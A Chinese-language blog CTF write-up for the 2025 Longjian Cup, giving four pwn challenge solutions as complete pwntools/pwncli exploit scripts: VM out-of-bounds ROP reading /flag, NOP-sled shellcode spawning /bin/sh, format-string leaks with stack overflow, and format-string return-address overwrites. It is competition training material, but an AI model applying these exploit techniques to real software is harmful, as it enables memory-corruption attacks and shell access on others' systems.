陇剑杯-2025

陇剑杯-2025

InkeyP Lv3
  2025-09-21 12:50:26 2025-09-21 12:50:26 创建   2025-09-21 13:15:10 2025-09-21 13:15:10 更新      2.5k 字  15 分钟  

陇剑杯 2025 WP

初赛

漏水流水线

越界读写,ROP orw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
#!/usr/bin/env python3
from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0

gift.elf = ELF(elf_path := './vuln')
if local_flag == "remote":
    addr = 'pwn-4f374d898f.challenge.longjiancup.cn 9999'
    ip, port = re.split(r'[\s:]+', addr)
    gift.io = remote(ip, port, ssl=True)
else:
    gift.io = process(elf_path)
gift.remote = local_flag in ("remote", "nodbg")
init_x64_context(gift.io, gift)
libc = load_libc()


def gc(op=0, d=10, s1=10, s2=10, imm=0):
    global code
    code += f'{op} {d} {s1} {s2} {imm}\t'


cmd = '''
    # brva 0x2D0C
    # op 0x47

    # brva 0x2B0A
    # op pop8

    # brva 0x23F0
    # op sub

    # brva 0x2EF8
    # WB

    brva 0x35B1
    # main return

    # ida
    c
'''
launch_gdb(cmd)

'''
mov     1
movi    2
add     3
sub     4
and     0x14 (src2 & src1)
or      0x15
xor     0x16
not     0x17
shl     0x18 (src1 << (imm & 0x3F))
shr     0x19 (src1 >> (imm & 0x3F))
mul     0x1A
div     0x1B
mod     0x1C
-       0x1D (-src1)
cmp     0x1E (src1 > src2 ? 1 : (src1 == src2 ? 0 : -1))
==      0x1F (src1 == src2 ? 1 : 0)
>       0x20 (src1 > src2 ? 1 : 0)
<       0x21 (src1 < src2 ? 1 : 0)

pop     0x32 (dest = stack[src1 + imm]) *(_BYTE *)
push    0x33 (stack[dest + imm] = src1) *(_BYTE *)
pop qd  0x34 (dest = stack[src1 + imm]) *(_QWORD *)
push qd 0x35 (stack[dest + imm] = src1) *(_QWORD *)
memmove 0x36 (memmove((stack + dest), (stack + src1), src2))
lea     0x47 (*src1 = dest)

exit    0x63
'''

CG.set_find_area(False, True)
code = ''
ru(b'input your opcode')
gc(0x34, 1, imm=0x20281D0 + 0x222200)  # environ
gc(0x34, 2, imm=0x20281D0 + 0x21A980)  # _IO_wfile_jumps

gc(2, 3, 3, imm=0x120)
gc(1)
gc(4, 1, 1, 3)
gc(2, 5, 5, imm=8)

rdi = CG.pop_rdi_ret()
gc(2, 3, 3, imm=(libc.sym._IO_wfile_jumps - rdi) >> 12)
gc(1)
gc(0x18, 3, 3, imm=12)
gc(2, 4, 4, imm=(libc.sym._IO_wfile_jumps - rdi) & 0xFFF)
gc(1)
gc(3, 3, 3, 4)
gc(1)
gc(4, 7, 2, 3)
gc(0x47, 7, 1)

gc(2, 3, 3, imm=0xA0)
gc(1)
gc(3, 6, 1, 3)
gc(1)
gc(3, 1, 1, 5)
gc(1)
gc(0x47, 6, 1)

gc(2, 3, 3, imm=(libc.sym.puts - rdi) >> 12)
gc(1)
gc(0x18, 3, 3, imm=12)
gc(2, 4, 4, imm=(libc.sym.puts - rdi) & 0xFFF)
gc(1)
gc(3, 3, 3, 4)
gc(1)
gc(3, 2, 7, 3)
gc(3, 1, 1, 5)
gc(1)
gc(0x47, 2, 1)

gc(3, 1, 1, 5)
gc(1)
gc(0x47, 7, 1)

gc(3, 1, 1, 5)
gc(1)
gc(0x47, 1, 1)

gc(2, 3, 3, imm=(libc.sym.gets - rdi) >> 12)
gc(1)
gc(0x18, 3, 3, imm=12)
gc(2, 4, 4, imm=(libc.sym.gets - rdi) & 0xFFF)
gc(1)
gc(3, 3, 3, 4)
gc(1)
gc(3, 2, 7, 3)
gc(3, 1, 1, 5)
gc(1)
gc(0x47, 2, 1)


gc(0x63)
sl(code)

ru(b'Executing\n')
libc_base = u64_ex(ru(b'\x0a', drop=True)[-6:]) - 0x29E40
set_current_libc_base_and_log(libc_base)

CG.reset()
CG.set_find_area(False, True)
ret = CG.ret()
rdi = CG.pop_rdi_ret()
rsi = CG.pop_rsi_ret()
rdx_rbx = CG.pop_rdx_rbx_ret()
rcx = CG.pop_rcx_ret()

payload = p64(ret) * 8 + flat([rdi, 0, rsi, libc_base + 0x21F000, rdx_rbx, 0x100, 0, libc.sym.read])
payload += flat(flat([rdi, libc_base + 0x21F000, rsi, 0, libc.sym.open]))
payload += flat([rdi, 1, rsi, 3, rdx_rbx, 0, 0, rcx, 0x100, libc.sym.sendfile])
sl(payload)

s(b'/flag\x00')

ia()

决赛

find_the_way

栈可执行,nop滑梯,把返回地址改成rbp,末位改为00

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python3
from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0

gift.elf = ELF(elf_path := './way')
if local_flag == "remote":
    addr = '173.31.73.75 9999'
    ip, port = re.split(r'[\s:]+', addr)
    gift.io = remote(ip, port)
else:
    gift.io = process(elf_path)
gift.remote = local_flag in ("remote", "nodbg")
init_x64_context(gift.io, gift)
libc = load_libc('/lib/x86_64-linux-gnu/libc.so.6')

cmd = '''
    b *0x4012AF
    b *0x401315
    c
'''
launch_gdb(cmd)

ru(b'Where is the your home:')
sl(str(0x80))
ru(b'Where can you find mother:')
s(b'\x00' + b'\x90' * 0x78 + b'\x48\x81\xc4\x00\x10\x00\x00' + ShellcodeMall.amd64.execve_bin_sh)
ru(b'How many moms did you find:')
sl(str(0xA8))

ia()

Writer

进dream的校验没清空栈,在write中布置好,submit时负数溢出拿到钱,dream格串+栈溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python3
from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0

gift.elf = ELF(elf_path := './writer')
if local_flag == "remote":
    addr = '173.31.73.39 9999'
    ip, port = re.split(r'[\s:]+', addr)
    gift.io = remote(ip, port)
else:
    gift.io = process(elf_path)
gift.remote = local_flag in ("remote", "nodbg")
init_x64_context(gift.io, gift)
libc = load_libc()

cmd = '''
    brva 0x17FC
    c
'''


sla(b'> ', b'1')
payload = (p32(0x3B) + p32(0x17)) * (0x500 // 8)
sa(b'Please enter your article.', payload)
sla(b'> ', b'2')
sla(b'How many articles do you want to submit?', str(-0x100))
sla(b'> ', b'114514')
ru(b'Please enter your article.')
s(b'%6$p#%9$p#%131$p#')
ru(b'0x')
code_base = int(ru(b'#0x', drop=True), 16) - 0x18E0
canary = int(ru(b'#0x', drop=True), 16)
libc_base = int(ru(b'#', drop=True), 16) - 0x90E93
set_current_code_base_and_log(code_base)
set_current_libc_base_and_log(libc_base)
leak_ex2(canary)

sla(b'> ', b'114514')
launch_gdb(cmd)
ru(b'Please enter your article.')
CG.set_find_area(False, True)
payload = b'a' * 0x408 + p64(canary) * 2 + flat([CG.ret(), CG.pop_rdi_ret(), CG.bin_sh(), libc.sym.system])
s(payload)


ia()

easypoivt

前几次格串改次数为超大整数

改返回地址

最后return

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
#!/usr/bin/env python3
from pwncli import *

context.terminal = ["tmux", "splitw", "-h", "-l", "130"]
local_flag = sys.argv[1] if len(sys.argv) == 2 else 0

gift.elf = ELF(elf_path := './easypivot')
if local_flag == "remote":
    addr = '173.31.73.6 9999'
    ip, port = re.split(r'[\s:]+', addr)
    gift.io = remote(ip, port)
else:
    gift.io = process(elf_path)
gift.remote = local_flag in ("remote", "nodbg")
init_x64_context(gift.io, gift)
libc = load_libc()

cmd = '''
    brva 0x136E
    brva 0x139E
    c
'''
sla(b'Which page of history will you write? (0 - 255)\n> ', str(0))
ru(b':\n> ')
s(b'%47$p%14$p%15$p')
ru(b'0x')
libc_base = int(ru(b'0x', drop=True), 16) - 0x2A47B
stack = int(ru(b'0x', drop=True), 16)
code_base = int(ru(b'\n', drop=True), 16) - 0x139A
set_current_code_base_and_log(code_base)
set_current_libc_base_and_log(libc_base)
leak_ex2(stack)

ret = stack + 0x8

sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(stack - 0x4 + 3) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{0x80}c%63$hn'.ljust(0x10, '\x00'))

CG.set_find_area(False, True)
rdi = CG.pop_rdi_ret()
ret_ = CG.ret()
sh = CG.bin_sh()
system = libc.sym.system
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 2) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 16) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 4) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 32) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))

ret += 8
rdi = sh
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 2) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 16) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 4) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 32) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))

ret += 8
rdi = ret_
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 2) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 16) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 4) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 32) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))

ret += 8
rdi = system
leak_ex2(ret)
leak_ex2(stack)
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 2) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 16) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(ret + 4) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{(rdi >> 32) & 0xFFFF}c%63$hn'.ljust(0x10, '\x00'))
launch_gdb(cmd)

sla(b'Which page of history will you write? (0 - 255)\n> ', str(1))
ru(b':\n> ')
s(f'%{(stack - 0x4 + 3) & 0xFFFF}c%32$hn'.ljust(0x10, '\x00'))
sla(b'Which page of history will you write? (0 - 255)\n> ', str(2))
ru(b':\n> ')
s(f'%{0}c%63$hn'.ljust(0x10, '\x00'))

ia()

  • 标题: 陇剑杯-2025
  • 作者: InkeyP
  • 创建于 : 2025-09-21 12:50:26
  • 更新于 : 2025-09-21 13:15:10
  • 链接: https://blog.inkey.top/202509/21/陇剑杯-2025/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
绝赞文章
湾区杯-2025 湾区杯-2025 PCTF-wp PCTF-wp 强网S8-final-JP 强网S8-final-JP
绝赞文章
湾区杯-2025 湾区杯-2025 PCTF-wp PCTF-wp
评论
目录
陇剑杯-2025
  1. 陇剑杯 2025 WP
    1. 初赛
      1. 漏水流水线
    2. 决赛
      1. find_the_way
      2. Writer
      3. easypoivt